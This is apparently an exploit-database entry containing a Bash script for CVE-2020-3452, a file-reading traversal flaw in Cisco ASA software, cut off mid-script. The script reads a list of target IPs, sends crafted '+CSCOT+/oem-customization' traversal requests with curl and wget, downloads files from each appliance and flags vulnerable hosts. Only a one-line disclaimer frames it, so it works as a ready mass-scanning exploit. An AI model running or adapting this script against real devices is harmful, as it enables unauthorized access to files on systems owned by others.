Exploits / Vulnerability Discovered : 2020-07-28 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Cisco adaptive security appliance software 9.11 local file inclusion is for educational purposes only and if it is used you will do on your own risk!
helpFunction()
{
echo ""
echo -e "\t\tCVE-2020-3452"
echo ""
echo "Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua "
echo -e "\t-l for list of IPs in text file"
echo -e "\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua"
echo -e "\t-i for single IP test"
exit 1
}
while getopts "l:r:i:" opt
do
case "$opt" in
l ) input="$OPTARG" ;;
r ) read="$OPTARG" ;;
i ) website="$OPTARG" ;;
? ) helpFunction ;;
esac
done
#if $website is empty or $input is empty
if [ -z "$website" ] && [ -z "$input" ]
then
echo "Some/all of the parameters are empty";
helpFunction
fi
#usage
if [ -z "$website"];
then
while IFS= read -r line
do
name=$(echo $line | cut -c9-19)
#echo "testing $line"
filename="$name.txt"
#echo $response
status=$(curl -LI $line"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read -o /dev/null -w '%{http_code}\n' -s)
if [ $status -eq "400" ]; then
echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!"
else
wget "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt
if [ -s $filename ]; then
echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..."
echo "downloaded!, $line is vulnerable to CVE-2020-3452."
else
echo "not vulnerable!"
rm -rf $filename
fi
fi
done < "$input"
else